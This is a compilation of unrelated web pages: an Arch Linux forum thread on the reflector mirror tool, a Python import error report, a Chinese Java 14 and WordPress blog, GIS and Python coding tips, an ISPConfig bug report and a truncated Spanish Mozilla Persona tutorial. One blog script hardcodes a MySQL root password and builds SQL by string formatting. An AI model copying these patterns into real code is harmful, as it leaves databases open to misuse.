Server = ftp://archlinux.supsec.org/pub/linux/arch/$repo/os/$arch
Server = http://mirror.umd.edu/archlinux/$repo/os/$arch
Server = ftp://cosmos.cites.illinois.edu/pub/archlinux/$repo/os/$arch
Server = http://cosmos.cites.illinois.edu/pub/archlinux/$repo/os/$arch
Server = http://mirrors.rutgers.edu/archlinux/$repo/os/$arch
Server = ftp://mirrors.xmission.com/archlinux/$repo/os/$arch
Server = http://mirrors.xmission.com/archlinux/$repo/os/$arch
Server = ftp://locke.suu.edu/linux/dist/archlinux/$repo/os/$arch
Server = ftp://cake.lib.fit.edu/archlinux/$repo/os/$arch
Server = http://mirrors.liquidweb.com/archlinux/$repo/os/$arch
Server = http://archlinux.surlyjake.com/archlinux/$repo/os/$arch
Server = ftp://ftp.gtlib.gatech.edu/pub/archlinux/$repo/os/$arch
Server = http://www.gtlib.gatech.edu/pub/archlinux/$repo/os/$arch
Server = http://cake.lib.fit.edu/archlinux/$repo/os/$arch
Server = ftp://ftp.archlinux.org/$repo/os/$arch
Server = http://mirror.mocker.org/archlinux/$repo/os/$arch
Server = ftp://mirror.rit.edu/archlinux/$repo/os/$arch
Server = http://mirror.ece.vt.edu/archlinux/$repo/os/$arch
Server = http://mirrors.us.kernel.org/archlinux/$repo/os/$arch
Server = http://mirror.rit.edu/archlinux/$repo/os/$arch
Last edited by mrman (2012-03-24 21:19:20)
Offline
Offline
When doing; export LANG=C ; reflector --list-countries
I get this;
Reflector.MirrorStatusError: "failed to retrieve mirror data: time data '2012-03-26T10:20:01Z' does not match format '%Y-%m-%d %H:%M:%S'"
I've got swedish date and time settings if that might be the fault? (And just reinstalled reflector as well)
Offline
Nice script !
Just a small typo in the help, a "Limit" is missing for the --grep option. Also, when trying to save on a location without permission (typically /etc/pacman.d/mirrorlist without being root), the exception is not correctly handled and itself throws an exception.
I would propose something like :
@@ -336,7 +336,7 @@
help='Return the n fastest mirrors that meet the other criteria.')
filters.add_argument('--grep', dest='grep', metavar='<regex>', action='append',
- help=' the list to URLs that match at least one of the given regular expressions.')
+ help='Limit the list to URLs that match at least one of the given regular expressions.')
filters.add_argument('-l', '--latest', dest='latest', type=int, metavar='n',
help='Limit the list to the n most recently synchronized servers.')
@@ -416,7 +416,7 @@
f.write(mirrorlist)
f.close()
except IOError as e:
- stderr.write(e)
+ stderr.write('error: %s\n' % e.strerror)
exit(1)
else:
print(mirrorlist)
Offline
Offline
Mirror Script that I don't quite have running correctly.
#!/bin/bash
## Written by MedianMajik.
find /etc/pacman.d/ -type f -name "mirrorlist.*" -printf '%A+ \n' -print0 -delete
find /etc/pacman.d/ -type f -name "mirrorlist" -printf 'mv "%h/%f" "%h/%f.SAF\n"' ;
reflector -c "United States" -a 1 -f 6 --sort rate --save /etc/pacman.d/mirrorlist
diff /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.SAF >> /etc/pacman.d/mirror.log
pacman -Syy
echo "Available packages for @box as of `date +%c`" > /etc/pacman.d/package.log
pacman -Qu >> /etc/pacman.d/package.log
Standard Ouput and Standard Error
mv "/etc/pacman.d/mirrorlist" "/etc/pacman.d/mirrorlist.SAF
"Traceback (most recent call last):
File "/usr/bin/reflector", line 5, in <module>
Reflector.main()
File "/usr/lib/python3.2/site-packages/Reflector.py", line 405, in main
ms, mirrors = process_options(options)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 378, in process_options
mirrors = ms.sort(mirrors, 'rate')
File "/usr/lib/python3.2/site-packages/Reflector.py", line 164, in sort
mirrors = self.rate(mirrors)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 224, in rate
q_in.join()
File "/usr/lib/python3.2/queue.py", line 82, in join
self.all_tasks_done.wait()
File "/usr/lib/python3.2/threading.py", line 235, in wait
waiter.acquire()
KeyboardInterrupt
/home/js/.scripts/update-mirrors.sh: line 7: /etc/pacman.d/mirror.log: Permission denied
warning: database file for 'extra' does not exist
error: you cannot perform this operation unless you are root.
/home/js/.scripts/update-mirrors.sh: line 9: /etc/pacman.d/package.log: Permission denied
/home/js/.scripts/update-mirrors.sh: line 10: /etc/pacman.d/package.log: Permission denied
One thing at a time
Offline
@medianmajik
What is the script doing and what do you expect it to do?
All I see is that you are killing it with a KeyboardInterrupt, which is not a bug. I could update the code to catch that and avoid the tracedump, but that would only be a cosmetic change.
Btw, you shouldn't use "pacman -Syy" in a script unless you update the system immediately afterward. It can break the system. Example:
pacman -Syy# some time laterpacman -S <some library>
Now only the library has been updated without updating packages that depend on it. Those packages depend on the old version and will no longer work. If this affects a critical package, the system will be unusable. There is a thread somewhere on the forum that goes into detail about this.
Look at the way paconky handles update detection. You can also use an alternative database with pacman ("pacman -b /some/temporary/path ...") but you will need to copy or symlink in the local database.
Offline
I'm facing some problem
reflector -f 10 --save /tmp/mirrorlist
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.2/threading.py", line 740, in _bootstrap_inner
self.run()
File "/usr/lib/python3.2/threading.py", line 693, in run
self._target(*self._args, **self._kwargs)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 281, in worker
l = len(f.read())
File "/usr/lib/python3.2/http/client.py", line 496, in read
s = self._safe_read(self.length)
File "/usr/lib/python3.2/http/client.py", line 590, in _safe_read
chunk = self.fp.read(min(amt, MAXAMOUNT))
File "/usr/lib/python3.2/socket.py", line 276, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.2/threading.py", line 740, in _bootstrap_inner
self.run()
File "/usr/lib/python3.2/threading.py", line 693, in run
self._target(*self._args, **self._kwargs)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 281, in worker
l = len(f.read())
File "/usr/lib/python3.2/http/client.py", line 496, in read
s = self._safe_read(self.length)
File "/usr/lib/python3.2/http/client.py", line 590, in _safe_read
chunk = self.fp.read(min(amt, MAXAMOUNT))
File "/usr/lib/python3.2/socket.py", line 276, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
Exception in thread Thread-4:
Traceback (most recent call last):
File "/usr/lib/python3.2/threading.py", line 740, in _bootstrap_inner
self.run()
File "/usr/lib/python3.2/threading.py", line 693, in run
self._target(*self._args, **self._kwargs)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 280, in worker
with urllib.request.urlopen(req, None, self.connection_timeout) as f:
File "/usr/lib/python3.2/urllib/request.py", line 138, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python3.2/urllib/request.py", line 369, in open
response = self._open(req, data)
File "/usr/lib/python3.2/urllib/request.py", line 387, in _open
'_open', req)
File "/usr/lib/python3.2/urllib/request.py", line 347, in _call_chain
result = func(*args)
File "/usr/lib/python3.2/urllib/request.py", line 1155, in http_open
return self.do_open(http.client.HTTPConnection, req)
File "/usr/lib/python3.2/urllib/request.py", line 1140, in do_open
r = h.getresponse()
File "/usr/lib/python3.2/http/client.py", line 1049, in getresponse
response.begin()
File "/usr/lib/python3.2/http/client.py", line 346, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.2/http/client.py", line 308, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.2/socket.py", line 276, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
The version is the latest
Name : reflector
Version : 2012.7.15-1
URL : http://xyne.archlinux.ca/projects/reflector
Licenses : GPL
I think it need some fix. I'll look at is.
Last edited by TheSaint (2012-07-26 14:54:33)
do it good first, it will be faster than do it twice the saint
Offline
Just THANK YOU
do it good first, it will be faster than do it twice the saint
Offline
Thanks a lot. This script is a life saver.
However, it has the unfortunate bug of requiring the existence of $HOME/.cache in order to run.
Also, where are the sources for your programs? It would be very helpful if I could see what could
have caused the problem.
Thanks,
Gesh
Offline
Sorry. Reading through Reflector.py I found that it reads XDG_CACHE_HOME which for some
reason is set on my computer. Unsetting it makes the problems vanish.
Gesh
Offline
I'm new and might be doing something wrong but when executing the command
# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
I get the following error
[root@archbang ~]# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
error: failed to cache JSON data ([Errno 2] No such file or directory: '/root/.cache/mirrorstatus.json')
Let me know what information I can give that can help problemsolve.
Offline
Have you tried running reflector as a regular user with sudo?
I did run the command you used as root and it worked fine.
Offline
I'm new and might be doing something wrong but when executing the command
# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
I get the following error
[root@archbang ~]# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
error: failed to cache JSON data ([Errno 2] No such file or directory: '/root/.cache/mirrorstatus.json')
Let me know what information I can give that can help problemsolve.
If only you were running Arch, we could help you.
Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
Sometimes it is the people no one can imagine anything of who do the things no one can imagine. -- Alan Turing
---
How to Ask Questions the Smart Way
Offline
<Insert smarta$$ response here>
$ uname -r
3.6.10-1-ARCH
$ sudo did the trick thanks for the tip karol
Offline
|
import pyximport
pyximport.install(pyimport=True, build_dir='xx')
import six
Traceback (most recent call last):
File "a.py", line 4, in <module>
import six
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 419, in load_module
return load_module(fullname, source_path, so_path=so_path, is_package=is_package)
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 233, in load_module
exec("raise exc, None, tb", {'exc': exc, 'tb': tb})
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module
mod = imp.load_dynamic(name, so_path)
File "six.py", line 805, in init six
_add_doc(reraise, """Reraise an exception.""")
ImportError: Building module six failed: ["NameError: name 'reraise' is not defined\n"]
import six to import requests, with another error:
Traceback (most recent call last):
File "a.py", line 4, in <module>
import requests
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 419, in load_module
return load_module(fullname, source_path, so_path=so_path, is_package=is_package)
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 233, in load_module
exec("raise exc, None, tb", {'exc': exc, 'tb': tb})
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module
mod = imp.load_dynamic(name, so_path)
File "__init__.py", line 43, in init requests.__init__
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 419, in load_module
return load_module(fullname, source_path, so_path=so_path, is_package=is_package)
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 233, in load_module
exec("raise exc, None, tb", {'exc': exc, 'tb': tb})
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module
mod = imp.load_dynamic(name, so_path)
File "__init__.py", line 8, in init urllib3.__init__
ImportError: Building module requests failed: ["ImportError: Building module urllib3 failed: ['ValueError: Attempted relative import in non-package\\n']\n"]
I did notice that project too. Sounds interesting. Currently it says: This code is in initial stages of development. It is present only for familiarization with the project.
Looking forward to see what they come up with. Having an optimizing JIT which is faster than LLVM would be very nice :)
|
Java 14相关
成为标准功能
温馨提示: 目前仅IDEA 2020.1 EAP及以上版本支持Java 14中所有新增功能.因此请使用最新版本(目前链接到2020.1 EAP版本,发布正式版之后,可在稳定版中下载.)!~
Switch表达式是Java 12加入的,在Java 13成为预览版,在Java 14成为标准版.也就是正式功能.
关于文本块的介绍,请查看这篇文章.
Java 14 在Java 13文本块的基础上,增加了两个转义序列: \ 和 \s .
例子:
var code = """
public void print($type o){
System.out.println(Objects.toString(o));
}
""".replace("$type", "abc");
// 输出: "public void print(abc o){\n System.out.println(Objects.toString(o));\n}\n"
会看到输出中包含了换行符 \n .
var code = """
public void print($type o){\
System.out.println(Objects.toString(o));\
}\
""".replace("$type", "abc");
// 输出 "public void print(abc o){ System.out.println(Objects.toString(o));}"
会发现换行符已经被去掉了.另外,文本块结尾也没有任何空格了.
var code = """
public void print($type o){\
Sy\stem.out.println(Objects.toString(o));\
}\
""".replace("$type", "abc");
// 输出: "public void print(abc o){ Sy tem.out.println(Objects.toString(o));}"
输出中,去掉了换行符.但是在System的Sy后面增加了一个空格(使用\s).可以看到输出里面明显增加了一个空格.
之前在做SSL的时候,会有个问题.文章中的图片或者视频链接全都是绝对路径(包含完整域名).如果要更换域名,或者从普通协议转到SSL的时候,需要替换全部非SSL的地址.
比如普通的是: http://www.bckf.cn ,如果文章中大量存在此类链接,会导致https访问时报错.
除了在数据库中直接替换之外,另外一个办法就是在编辑器里面做处理了(编辑器里面的设置仅对后续的文章有效,之前的文章只能通过数据库处理).
修改之前,请先备份相关文件!
1. 博客主目录/wp-admin/includes/ajax-actions.php
1.1 wp_ajax_query_attachments()函数中
在
$posts = array_filter( $posts );
的下面,增加如下内容:
foreach($posts as &$el){
$newurl=str_replace(home_url(),"",$el['url']);
$el['url']=$newurl; //str_replace(home_url(),"",$el["url"]);
$el['sizes']['full']['url']=$newurl;
$el['sizes']['medium']['url']=str_replace(home_url(),"",$el['sizes']['medium']['url']);
$el['sizes']['thumbnail']['url']=str_replace(home_url(),"",$el['sizes']['thumbnail']['url']);
$el['sizes']['large']['url']=str_replace(home_url(),"",$el['sizes']['large']['url']);
}
unset($el); // 销毁$el的引用.
1.2 wp_ajax_send_attachment_to_editor()函数
在
$html = apply_filters( 'media_send_to_editor', $html, $id, $attachment );
的下面增加:
$html=str_replace(home_url(),"",$html);
2. 博客主目录/wp-admin/includes/media.php:
在
media_send_to_editor( $html )
函数的第一行,增加:
$html=str_replace(home_url(),"",$html);
Java 14增加了一个Record的预览功能.预览:在后续JDK版本中可能有变化,也可能成为永久功能.
Record和enum枚举类似,只是Record是半不可变类.在很多地方也可以将Record当做class一样使用.
特点简述:
定义一个User的record:
record User(String name, int age){ }
中间可以不写任何内容.
可以像调用类一样,调用Record,如下:
var dur=new User("tea2",20);
var acs=new User("tea2",20);
System.out.println(dur.name());
System.out.println(dur.age());
System.out.println(dur.equals(acs));
System.out.println(acs.age());
System.out.println(acs.name());
这里的dur和acs只能通过构造函数初始化属性.系统会自动生成equals,可以直接比较两个record是否一致.
在Record中,可以添加静态字段或者静态实例,静态方法:
record User(String name, int age){
public User {
callNumber++;
}
private static int callNumber;
static int getCallNumber(){
return callNumber;
}
}
调用:
var dur=new User("tea2",20);
var acs=new User("tea2",20);
System.out.println(User.getCallNumber());
构造函数可以写成两种方式.同时在构造函数中,进行各种验证操作.
在IDEA中可以通过快捷方式进行转换.如下图:
Java 14 Record简化构造函数转换为传统构造函数:
Java 14 Record传统构造函数转换为简化构造函数:
record User(String name, int age){
public User(String name, int age) {
// 进行各种验证操作.
if(age<20){
throw new IllegalArgumentException("age小于20.");
}
callNumber++;
this.name = name;
this.age = age;
}
private static int callNumber;
static int getCallNumber(){
return callNumber;
}
}
record User(String name, int age){
public User {
// 进行验证操作.
if(age<20){
throw new IllegalArgumentException("age小于20.");
}
callNumber++;
}
private static int callNumber;
static int getCallNumber(){
return callNumber;
}
}
可以这样定义泛型:
record MobilePhone(T phone,double price){
}
然后定义一个Record,定义一个普通类:
record HuaWei(){
private static final String name="Huawei";
private static final String model="mate 20 pro";
public String name(){
return name;
}
public String model(){
return model;
}
}
class XiaoMi{
private static final String name="Xiaomi";
private static final String model="9";
public String name(){
return name;
}
public String model(){
return model;
}
}
调用:
var huaWeiMobilePhone=new MobilePhone(new HuaWei(),6000);
var xiaomiMobilePhone=new MobilePhone(new XiaoMi(),6100);
System.out.println(huaWeiMobilePhone.phone().name());
System.out.println(xiaomiMobilePhone.phone().name());
System.out.println(huaWeiMobilePhone.toString());
System.out.println(xiaomiMobilePhone.toString());
输出结果:
Huawei Xiaomi MobilePhone[phone=HuaWei[], price=6000.0] MobilePhone[phone=cn.bckf.java14demo.XiaoMi@25f38edc, price=6100.0]
可以看到,普通类和Record只在toString()的实现上有些差别.
record User(String name, int age) implements Serializable {
}
static void write(User user, String filePath) {
try (var oos = new ObjectOutputStream(Files.newOutputStream(Paths.get(filePath)))) {
oos.writeObject(user);
} catch (IOException e) {
e.printStackTrace();
}
}
static User read(String filePath) {
User user = null;
try (var oos = new ObjectInputStream(Files.newInputStream(Paths.get(filePath)))) {
// 此处使用了instanceof模式匹配.该特性为JDK 14新增加.
if (oos.readObject() instanceof User user1) {
user = user1;
}
/*
上面的语句也可以写成:
user= (User) oos.readObject();
*/
} catch (IOException | ClassNotFoundException e) {
e.printStackTrace();
}
return user;
}
import java.io.*;
import java.nio.file.Files;
import java.nio.file.Paths;
record User(String name, int age) implements Serializable {
}
public class Main {
static void write(User user, String filePath) {
try (var oos = new ObjectOutputStream(Files.newOutputStream(Paths.get(filePath)))) {
oos.writeObject(user);
} catch (IOException e) {
e.printStackTrace();
}
}
static User read(String filePath) {
User user = null;
try (var oos = new ObjectInputStream(Files.newInputStream(Paths.get(filePath)))) {
// 此处使用了instanceof模式匹配.该特性为JDK 14新增加.
if (oos.readObject() instanceof User user1) {
user = user1;
}
/*
上面的语句也可以写成:
user= (User) oos.readObject();
*/
} catch (IOException | ClassNotFoundException e) {
e.printStackTrace();
}
return user;
}
public static void main(String[] args) {
var user = new User("测试用户", 20);
var filePath = "Java14Record";
write(user, filePath);
var readUser = read(filePath);
System.out.println(readUser.toString());
}
}
目前发布的版本中,record和var一样是受限制的标识符,并非关键字.所以record可以像下面这样使用:
var record=100;
void record(){}
但是不能用于类名使用,下面的代码会提示编译错误(‘record’是受限制的标识符,不能用于类型声明):
class record{}
IDEA提供了一个反编译的功能,位置如下:
编译之后的类:
// IntelliJ API Decompiler stub source generated from a class file
// Implementation of methods is not available
package cn.bckf.java14demo;
final class User extends java.lang.Record implements java.io.Serializable {
private final java.lang.String name;
private final int age;
public User(java.lang.String name, int age) { /* compiled code */ }
public java.lang.String toString() { /* compiled code */ }
public final int hashCode() { /* compiled code */ }
public final boolean equals(java.lang.Object o) { /* compiled code */ }
public java.lang.String name() { /* compiled code */ }
public int age() { /* compiled code */ }
}
会发现,编译之后,自动生成了toString(),hashCode(),equals(),和属性的获取方法(没有get前缀),同时,属性被private final修饰.
好了,可以开始愉快的使用Record了.☺
最近在用Twenty Fifteen主题,用了一下颜色功能.发现挺好用.有个想法,就是白天颜色自动变成亮色,晚上颜色自动变成暗色.
找了一下资料,发现颜色配置存储在wp_options表里面,用列option_name值为’theme_mods_twentyfifteen’的字段存储.
一下就好办多了.
如果使用了Autoptimize或者其它缓存插件,在更新颜色的Shell脚本里面一定要先更新颜色,然后清除一次缓存.
Python版本: 需要使用Python3.6+.
首先需要安装Python连接MySQL的插件:
pip install mysql-connector-python
有的可能需要使用:
pip3 install mysql-connector-python
import mysql.connector
from mysql.connector import errorcode
import sys
'''
定时更新Wordpress的Twenty Fifteen主题的颜色配置.
安装: pip install mysql-connector-python
调用: python3 BckfCNUpdateTheme.py blueStyle
调用: python3 BckfCNUpdateTheme.py darkStyle
调用: python3 BckfCNUpdateTheme.py yellowStyle
调用: python3 BckfCNUpdateTheme.py pinkStyle
调用: python3 BckfCNUpdateTheme.py purpleStyle
'''
# 配色yellow 黄色
yellowStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"f4ca16";s:12:"color_scheme";s:6:"yellow";s:17:"sidebar_textcolor";s:7:"#111111";s:23:"header_background_color";s:7:"#ffdf00";s:12:"header_image";s:13:"remove-header";}'
# 配色 粉色
pinkStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"ffe5d1";s:12:"color_scheme";s:4:"pink";s:17:"sidebar_textcolor";s:7:"#ffffff";s:23:"header_background_color";s:7:"#e53b51";s:12:"header_image";s:13:"remove-header";}'
# 配色 purple 紫色
purpleStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"674970";s:12:"color_scheme";s:6:"purple";s:17:"sidebar_textcolor";s:7:"#ffffff";s:23:"header_background_color";s:7:"#2e2256";s:12:"header_image";s:13:"remove-header";}'
# 配色blue 蓝色
blueStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"e9f2f9";s:12:"color_scheme";s:4:"blue";s:17:"sidebar_textcolor";s:7:"#ffffff";s:23:"header_background_color";s:7:"#55c3dc";s:12:"header_image";s:13:"remove-header";}'
# 配色dark. 暗色
darkStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"111111";s:12:"color_scheme";s:4:"dark";s:17:"sidebar_textcolor";s:7:"#bebebe";s:23:"header_background_color";s:7:"#202020";s:12:"header_image";s:13:"remove-header";}'
def updateStyle(style):
try:
cnx = mysql.connector.connect(user='root',
database='wordpress',host='127.0.0.1',password='123')
cursor = cnx.cursor()
result=cursor.execute("""update wp_options set option_value='{0}' where option_name='theme_mods_twentyfifteen' """.format(style))
print(result)
cnx.commit()
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
else:
cursor.close()
cnx.close()
print("处理完成!~")
if __name__ == '__main__':
if len(sys.argv)>1:
styleStr=sys.argv[1]
if styleStr=='blueStyle':
updateStyle(blueStyle)
elif styleStr=='darkStyle':
updateStyle(darkStyle)
elif styleStr=='yellowStyle':
updateStyle(yellowStyle)
elif styleStr=='pinkStyle':
updateStyle(pinkStyle)
elif styleStr=='purpleStyle':
updateStyle(purpleStyle)
Shell脚本(在Shell脚本中写下面这段代码,并保存文件):
python3 BckfCNUpdateTheme.py blueStyle
定时任务(第一条每天晚上20点执行,第二条每天早上8点执行.):
0 20 * * * sh /opt/style01.sh
0 8 * * * sh /opt/style02.sh
如果没有使用缓存插件,也可以将调用Python程序的语句直接写在定时任务里面.
|
You can use Python with shapely , with PyQGIS or directly with OpenJump GIS or PostGIS as mnt.biker says.
With Python:
1) the first solution is to find the intersections of the lines and then break the input coords into parts (look at cut.py or Get the vertices on a LineString either side of a Point with shapely) -> not very easy...
2) a more direct solution is to use the union operations (combinewith PyQGIS) : the method will split all self-intersection geometries ([geos-devel] split self-intersecting LineString into non-intersecting lines)
Example with shapely and Fiona (similar with PyQGIS)
import fiona
# open the line shapefile and transform to shapely geometry
file = fiona.open('line.shp')
from shapely.geometry import shape
line = shape(file.next()['geometry'])
# open the contours shapefile and transform to MultLineString shapely geometry
Multi = MultiLineString([shape(lin['geometry']) for lin in fiona.open('contours.shp')])
# now you can use the `union`, `cascaded_union`or `unary_union`of shapely
result = unary_union([line, Multi])
and save the resulting shapefile with Fiona.
If you want to save only the line that needs to be cut, look at Code for splitting a line with another line
And you can use a spatial index with the module Rtree to speed things up.
3) but the most comprehensive solution is to compute the Topological Planar Graph of the combined layers.
it can be drawn on the plane in such a way that its edges intersect only at their endpoints. In other words, it can be drawn in such a way that no edges cross each other
I have a Python class to do it but I will use here OpenJump:
Whith OpenJump GIS and Planar Graph command
1) you load the shapefiles and compute the union (combined layer):
2) you compute the Planar Graph
3) and you have the nodes, the faces and the arcs (edges) of the Graph as as the result , all with the corresponding attribute values preserved.
Whith PostGIS (version 2.00 and up) (mnt.biker answer)
The result are the same
New
In OpenJUMP use Combine Layers("Rassemblez les couches" in French) and not Union
|
I've been coding again and just remembered how well this website works for keeping track of cool tricks I learn. Sometimes it's really hard to find simple and generic examples of things to help teach the fundamentals. I needed to write to a file without opening the text document 1000 times and I finally found a really clean example that helped me understand the pieces.
Edit** Threadpool is a lot easier and you can thread inside a loop:
from multiprocessing.pool import ThreadPool as Pool
threads = 100
p = Pool(threads)
p.map(function, list)
More complicated version:
import threading
lock = threading.Lock()
def thread_test(num):
phrase = "I am number " + str(num)
with lock:
print phrase
f.write(phrase + "\n")
threads = []
f = open("text.txt", 'w')
for i in range (100):
t = threading.Thread(target = thread_test, args = (i,))
threads.append(t)
t.start()
while threading.activeCount() > 1:
pass
else:
f.close()
Close something on Scrapy spider close without using a pipeline:
from scrapy import signals
from scrapy.xlib.pydispatch import dispatcher
class MySpider(CrawlSpider):
def __init__(self):
dispatcher.connect(self.spider_closed, signals.spider_closed)
def spider_closed(self, spider):
# second param is instance of spder about to be closed.
Instead of using an if time or if count to activate something I found a decorator that will make sure the function on runs once:
def run_once(f):
def wrapper(*args, **kwargs):
if not wrapper.has_run:
wrapper.has_run = True
return f(*args, **kwargs)
wrapper.has_run = False
return wrapper
@run_once
def my_function(foo, bar):
return foo+bar
You can also resize the terminal inside the code:
import sys
sys.stdout.write("\x1b[8;{rows};{cols}t".format(rows=46, cols=54))
I got stuck for a while trying to get my repository to let me login without creating an ssh key (super annoying imo) and I figured out that I added the ssh url for the origin url and needed to reset it to the http:
change origin url
git remote set-url origin <url-with-your-username>
Combine mp3 files with linux:
ls *.mp3
sudo apt-get install mp3wrap
mp3wrap output.mp3 *.mp3
Regex is always better than splitting a bunch of times and making the code messy. Plus it's a lot easier to pick up the code later on and figure out what's going on. So I decided to take my regex to the next level and start labeling groups (I'm even going to give it it's very own tag :3:
pat = r'(?<=\,\"searchResults\"\:\{)(?<list_results>.*)(?=\,\"resultsHash\"\:)'
m = re.match(pat, url)
if m:
self.domain = m.group('list_results')
|
Backup tries to also run -and fails- on secondary DNS server, without having Webservice enabled here.
short description
What is happening and what is wrong with that?
I have a multi-server environment with 2 servers (one of them is the master) and a secondary DNS server that has only DB and DNS services installed and enabled on. The secondary DNS server is mirroring the "master" webserver where the primary DNS service runs. Since the 3.2 update the backup of the websites is reporting error on the secondary DNS server as well, despite the fact these websites are not residing on it but on the master webserver only. The errors stating that the backup was not possible to run for the sites. (since the path is not valid on the secondary DNS but only on the master web server.)
The backup on the server, holding the site takes place properly.
correct behaviour
What should happen instead?
The backup shall only run on the webserver where the sites do reside and not on any mirrored server, especially if the service is not enabled on it at all.
environment
Server OS: debian 9Server OS version: stretchISPConfig version: 3.2you can use grep 'ISPC_APP_VERSION' /usr/local/ispconfig/server/lib/config.inc.php to get it from the command line
If it might be related to the problem
insert the output of `nginx -v` or `apachectl -v` here
root@castor:~# apachectl -v
Server version: Apache/2.4.25 (Debian)
Server built: 2019-10-13T15:43:54
insert the output of `php -v` here
root@castor:~# php -v
PHP 7.0.33-34+0~20201018.42+debian9~1.gbp80c9be (cli) (built: Oct 18 2020 21:35:49) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
with Zend OPcache v7.0.33-34+0~20201018.42+debian9~1.gbp80c9be, Copyright (c) 1999-2017, by Zend Technologies
with Xdebug v2.8.1, Copyright (c) 2002-2019, by Derick Rethans
## proposed fix
optional, of course.
if you want to post code snippets, please use
your code
or attach a code file. Best is to create a merge request of course.
## references
if you know of related bugs or feature requests, please reference them by using `#<bugnumber>`, e. g. #123
if you have done a merge request already, please reference it by using `!<mergenumber>`, e. g. !12
if you know of a forum post on howtoforge.com that deals with this topic, just add the link to the forum topic here
## screenshots
optional, of course.
Add screenshots of the problem by clicking "Attach a file" on the bottom right.
## log entries
apache / nginx error.log lines (if related)
|
Agregar el sistema de identificación de Mozilla Persona a tu sitio web solo requiere seguir estos cinco pasos:
Incluye en tus páginas la biblioteca JavaScript de Mozilla Persona.
Agrega los botones "conectar" y "desconectar".
Presta atención a las acciones de conexión y desconexión.
Comprueba las credenciales de los usuarios.
Revisa las buenas prácticas.
Con esto deberías poder ponerlo en funcionamiento en una sola tarde, pero lo primero es lo primero: si vas a usar Mozilla Persona en tu sitio, por favor, dedica unos minutos a suscribirte a la lista de correo de Mozilla Persona. Tiene muy poco tráfico ya que solo se usa para anunciar cambios o cuestiones relacionadas con la seguridad que pueden tener un impacto negativo sobre tu sitio.
Persona está diseñado para no depender del navegador y funciona correctamente con la todos los naveadores de escritorio y móviles modernos. Esto es posible gracias a la biblioteca JavaScript multiplataforma de Persona. Una vez que se carga ésta biblioteca en tu página, las funciones de Persona que necesitas (watch(), request(), y logout()) estarán disponibles en el objeto global navigator.id.
Para incluir la biblioteca JavaScript de Persona, puedes colocar ésta etiqueta script en el head de tu página:
<script src="https://login.persona.org/include.js"></script>
Debes incluir esto en todas las páginas que usen las funciones navigator.id. Debido a que Persona está aún en desarrollo, no debes alojar en tu servidor el archivo include.js.
Debido a que Persona está diseñado como una API DOM, debes ejecutar funciones cuando un usuario haga clic en los botones de inicio y cierre de sesión en tu web. Para abrir un diálogo de Persona y pedir que el usuario inicie sesión, debes ejecutar navigator.id.request(). Para cerrar sesión, ejecuta navigator.id.logout().
Por ejemplo:
var signinLink = document.getElementById('signin');
if (signinLink) {
signinLink.onclick = function() { navigator.id.request(); };
};
var signoutLink = document.getElementById('signout');
if (signoutLink) {
signoutLink.onclick = function() { navigator.id.logout(); };
};
¿Cómo deben ser esos botones? Da un vistazo a nuestra página de recursos de marca para conseguir imágenes y botones css predefinidos.
Para que Persona funcione, necesitas indicarle qué hacer cuando un usuario inicia o cierra sesión. Este se puede realizar llamando a la función navigator.id.watch() y pasandole tres parámetros:
El loggedInEmaildel actual usuario de tu sitio, onullsi no existe. Deberías generar esto dinámicamente cuando la página es pintada.
Una función a la que invocar cuando la acción
onlogines desencadenada. Esta función se pasa como un parámetro único, una "afirmación de identidad", que debe ser verificada.
Una función a la que invocar cuando la acción
onlogoutes desencadenada. En esta función no se pasa ningún parámetro.
Nota: Siempre tienes que incluir ambas funciones, onlogin y onlogout, cuando llames a navigator.id.watch().
Por ejemplo, si actulamente crees que Bob ha iniciado sesión en tu sitio, puedes hacer esto:
var currentUser = 'bob@example.com';
navigator.id.watch({
loggedInEmail: currentUser,
onlogin: function(assertion) {
// Un usuario ha iniciado sesión! Aquí necesitas:
